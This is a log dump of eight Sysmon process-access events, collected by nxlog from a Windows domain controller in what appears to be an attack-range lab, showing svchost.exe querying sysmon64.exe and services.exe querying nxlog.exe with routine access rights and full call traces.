{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1400,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1401,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.174\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1120\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00108BBC0200}\r\nTargetProcessId: 2884\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.174","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1120","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00108BBC0200}","TargetProcessId":"2884","TargetImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1402,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1403,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1404,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1405,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1406,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1407,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
